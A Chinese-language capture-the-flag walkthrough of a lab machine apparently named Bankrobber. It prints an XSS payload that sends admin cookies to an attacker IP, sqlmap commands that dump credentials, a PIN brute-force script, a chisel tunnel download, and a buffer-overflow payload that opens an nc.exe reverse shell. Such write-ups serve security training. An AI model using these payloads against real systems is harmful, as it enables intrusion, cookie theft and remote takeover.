80/443端口

gobuster dir -u http://10.10.10.154 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt

登陆后 Cookie 信息包含id、username、password 

其中username和password的值由 base64 编码得到，通过以下命令可直接还原。

echo "bWFj" | base64 -d

0x02 上线[cortin]

XSS获取管理员Cookie

function get_cookie(){    var img = document.createElement("img");    img.src = "http://10.10.14.14/xss?=" + document.cookie;    document.body.appendChild(img);}get_cookie();

python -m SimpleHTTPServer 80

<script src="http://10.10.14.14/xss.js"></script>

SQL注入

交易列表

在后门识别处存在提示信息：可以快速识别位于服务器上的后门，但出于安全只能运行dir命令。

输入 dir 后显示它只能在 localhost 下运行。

用户搜索

1' order by 3-- -

-1' union select 1,2,3-- --1' union select version(),user(),3-- -

sqlmap -r search_sqli.txt --dbs

sqlmap -r search_sqli.txt -D bankrobber --tables

sqlmap -r search_sqli.txt -D bankrobber -T users --dump

sqlmap -r search_sqli.txt --passwords

PHP代码审计

sqlmap -r search_sqli.txt --file-read '/xampp/htdocs/admin/backdoorchecker.php'

<?phpinclude('../link.php');include('auth.php');
$username = base64_decode(urldecode($_COOKIE['username']));$password = base64_decode(urldecode($_COOKIE['password']));$bad      = array('$(','&');$good     = "ls";
if(strtolower(substr(PHP_OS,0,3)) == "win"){        $good = "dir";}
if($username == "admin" && $password == "Hopelessromantic"){        if(isset($_POST['cmd'])){                        // FILTER ESCAPE CHARS                        foreach($bad as $char){                                if(strpos($_POST['cmd'],$char) !== false){                                        die("You're not allowed to do that.");                                }                        }                        // CHECK IF THE FIRST 2 CHARS ARE LS                        if(substr($_POST['cmd'], 0,strlen($good)) != $good){                                die("It's only allowed to use the $good command");                        }
                        if($_SERVER['REMOTE_ADDR'] == "::1"){                                system($_POST['cmd']);                        } else{                                echo "It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server.";                        }        }} else{        echo "You are not allowed to use this function!";}?>

信息收集

dir c:\

icacls c:\bankv2.execacls c:\bankv2.exe

netstat -ano

tasklist | findstr 1640

tasklist /V

%temp%\nc.exe 127.0.0.1 910

搭建隧道

cd C:\Users\Cortin\AppData\Local\Temppowershell -c "wget http://10.10.14.16/chisel.exe -o chisel.exe"

./chisel server -p 8000 --reverse

chisel.exe client 10.10.14.16:8000 R:910:localhost:910

nc localhost 910

尝试编写 python 脚本用于暴力破解 PIN 码，首先建立 socket 连接本地910端口，发送 PIN 码和换行符并在响应中检查是否包含Access denied，如果不存在说明成功找到 PIN 码。

import socket import sys
for i in range(10000):    sys.stdout.write(f"\rTring: {i:04d}")    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.connect(('localhost',910))    s.recv(4096)    s.send(f"{i:04d}\n".encode())    resp = s.recv(4096)    if not b"Access denied" in resp:        print(f"\rFound pin: {i:04d}")        break    s.close()

运行发现 PIN 码为0021。

这貌似是一个比特币转账程序，输入任意字符显示正在执行。

nc localhost 910

尝试输入一串 A 字符，结果显示它覆盖了正在执行的文件名称。

nc localhost 910

使用 msf-pattern_create 生成40位随机数值并作为金额进行提交。

msf-pattern_create -l 40

成功拿到偏移量为32。

msf-pattern_offset -q 0Ab1

使用 python 输出偏移字符+用于反弹shell的payload。

python -c 'print "A"*32 + "\\Users\\Cortin\\AppData\\Local\\Temp\\nc.exe -e cmd.exe 10.10.14.16 4433"'

在本地监听4433端口。

rlwrap nc -nvlp 4433

运行程序输入 payload。

成功拿到系统权限。

在管理员用户 admin 桌面寻找第二个flag。

dir c:\Users\admin\Desktoptype c:\Users\admin\Desktop\root.txt

成功拿到第二个flag。

在站点中注册账户，登陆后查看http请求包发现Cookie编码方式为base64，同时在转账的评论处发现XSS漏洞，提交带有XSS的转账信息在管理员访问后可获取其Cookie信息，对Cookie进行解码后拿到明文。

登陆管理界面，发现其中存在SQL注入漏洞，通过SQL注入拿到站点用户密码以及数据库管理员root密码。XSS和CSRF联动使管理员执行反弹shell命令，从而获取到目标用户权限。在靶机中发现异常端口910，其对应程序为bankv2.exe，连接该端口提示我们需要输入PIN码（4位数字），由于靶机上没有python环境，无法执行爆破脚本。

因此可建立隧道帮助我们爆破PIN码并成功进入。经过测试后发现该程序存在缓冲区溢出漏洞，利用该漏洞执行反弹shell可成功获取系统权限。

作者：特mac0x01 ，文章转载于FreeBuf。

侵权请私聊公众号删文

查看更多精彩内容，还请关注橘猫学安全：

每日坚持学习与分享，觉得文章对你有帮助可在底部给点个“再看”